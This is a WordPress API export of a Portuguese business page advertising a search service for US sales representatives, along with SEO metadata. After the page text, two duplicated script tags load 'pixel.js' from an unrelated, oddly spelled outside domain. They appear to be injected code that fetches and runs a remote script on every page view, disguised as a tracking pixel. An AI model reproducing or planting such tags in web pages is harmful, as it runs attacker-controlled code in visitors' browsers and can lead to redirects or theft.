{"id":3154,"date":"2014-08-16T07:17:35","date_gmt":"2014-08-16T07:17:35","guid":{"rendered":"https:\/\/americanagent.com\/sales-representative-search-2\/"},"modified":"2014-09-05T11:18:30","modified_gmt":"2014-09-05T15:18:30","slug":"procura-do-eua-representante","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/","title":{"rendered":"PROCURA DO EUA REPRESENTANTE"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-d645caf1d3fc4b297bd9f4891783c960\">\n#top .av-special-heading.av-av_heading-d645caf1d3fc4b297bd9f4891783c960{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-d645caf1d3fc4b297bd9f4891783c960 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-d645caf1d3fc4b297bd9f4891783c960 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-d645caf1d3fc4b297bd9f4891783c960 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >PROCURA DO EUA REPRESENTANTE<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-2989cb1a500f76248ec894598f4e8e5e '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>A contrata\u00e7\u00e3o do Representante de Vendas experiente e de confian\u00e7a \u00e9 provavelmente a mais forte forma de entrar no mercado dos EUA. \u00c0s vezes a situa\u00e7\u00e3o exige este tipo de abordagem imediata.<\/p>\n<p>N\u00f3s somos capazes de encontrar Representantes de Vendas dos EUA e outros Especialistas na Mat\u00e9ria destes Assuntos de \u00e2mbito nacional, qualquer ind\u00fastria, qualquer n\u00edvel de experi\u00eancia.<\/p>\n<p>Os Representantes de Vendas Americanos podem ser muito cautelosos sobre o contrato com empresas estrangeiras, \u00e0s vezes o melhor candidato \u00e9 perdido durante as negocia\u00e7\u00f5es finais, porque a empresa n\u00e3o entende algumas das quest\u00f5es que s\u00e3o importantes para os Representantes de Vendas Americanos (por exemplo, na quest\u00e3o dos seguros m\u00e9dicos), pode ser bastante dif\u00edcil de superar estes pequenos bloqueios por vezes.<\/p>\n<p>N\u00f3s compreendemos muito bem as suas preocupa\u00e7\u00f5es e tamb\u00e9m somos capazes de explicar a import\u00e2ncia destas quest\u00f5es para que possam compreender o seu ponto de vista. N\u00f3s sabemos como superar estas situa\u00e7\u00f5es.<\/p>\n<p>N\u00f3s gostamos de debater com os Representantes de Vendas Americanos, introduzir oportunidades e empresas \u00fanicas com \u00f3ptimos produtos. Eles tamb\u00e9m entendem os benef\u00edcios de serem um dos seus primeiros Representantes de Vendas para o territ\u00f3rio dos EUA.<\/p>\n<p>N\u00f3s utilizamos os mesmos recursos que os recrutadores e \u201cCa\u00e7adores de Talentos\u201d locais Americanos. No entanto, n\u00f3s oferecemos uma solu\u00e7\u00e3o muito mais econ\u00f3mica e apenas realizamos estas pesquisas muito espec\u00edficas de Representantes de Vendas, compreendendo a sua posi\u00e7\u00e3o internacional.<\/p>\n<p>Cronograma de um projecto t\u00edpico, isto naturalmente pode variar dependendo do n\u00famero de representantes necess\u00e1rios ou m\u00faltiplos territ\u00f3rios em causa.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3154","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PROCURA DO EUA REPRESENTANTE - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/\" \/>\n<meta property=\"og:locale\" content=\"pt_PT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PROCURA DO EUA REPRESENTANTE - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-05T15:18:30+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/procura-do-eua-representante\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/procura-do-eua-representante\\\/\",\"name\":\"PROCURA DO EUA REPRESENTANTE - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:35+00:00\",\"dateModified\":\"2014-09-05T15:18:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/procura-do-eua-representante\\\/#breadcrumb\"},\"inLanguage\":\"pt-PT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/procura-do-eua-representante\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/procura-do-eua-representante\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PROCURA DO EUA REPRESENTANTE\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-PT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PROCURA DO EUA REPRESENTANTE - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/","og_locale":"pt_PT","og_type":"article","og_title":"PROCURA DO EUA REPRESENTANTE - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-05T15:18:30+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/","url":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/","name":"PROCURA DO EUA REPRESENTANTE - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-pt\/#website"},"datePublished":"2014-08-16T07:17:35+00:00","dateModified":"2014-09-05T15:18:30+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/#breadcrumb"},"inLanguage":"pt-PT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-pt\/procura-do-eua-representante\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-pt\/"},{"@type":"ListItem","position":2,"name":"PROCURA DO EUA REPRESENTANTE"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-pt\/#website","url":"https:\/\/americanagent.com\/pt-pt\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-pt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-PT"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages\/3154","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/comments?post=3154"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages\/3154\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/media?parent=3154"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}